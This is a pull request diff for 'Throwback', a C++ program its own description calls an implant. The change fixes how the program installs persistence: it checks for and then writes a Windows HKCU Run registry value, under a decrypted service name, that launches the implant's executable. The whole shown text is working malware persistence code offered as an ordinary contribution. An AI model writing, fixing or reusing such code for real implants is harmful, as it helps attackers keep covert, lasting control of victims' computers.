### PR TITLE
Fix registry check for runkey

### DIFF
--- a/Throwback/main.cpp
+++ b/Throwback/main.cpp
@@ -180,9 +180,10 @@ int installRunKey()
 		wstring value = decryptString(SVCNAME, (sizeof(SVCNAME)/sizeof(int)));
 
 		//DON'T INSTALL PERSISTENCE IF IT'S ALREADY THERE
-		key.append(value.c_str());
+		//key.append(value.c_str());
+		int keyCheck = RegQueryValueEx(runKey, value.c_str(), 0, 0, 0, 0);
 		tmpKey = regOpenKey(HKEY_CURRENT_USER, key.c_str(), KEY_ALL_ACCESS);
-		if(tmpKey != NULL)
+		if(keyCheck != 0)
 		{
 			if(RegSetValueEx(runKey, value.c_str(), 0, REG_SZ, (BYTE *)DSTEXE, len + 1) == ERROR_SUCCESS)
 			{


### PR DESCRIPTION
The registry was improperly adding the runKey and the SVCNAME together, and checking for a run key. Modified the query and subsequent check for the Key/Value pair. Throwback will now add a Run Key entry for the proper SVCNAME. Removal of the implant will also remove the key appropriately.
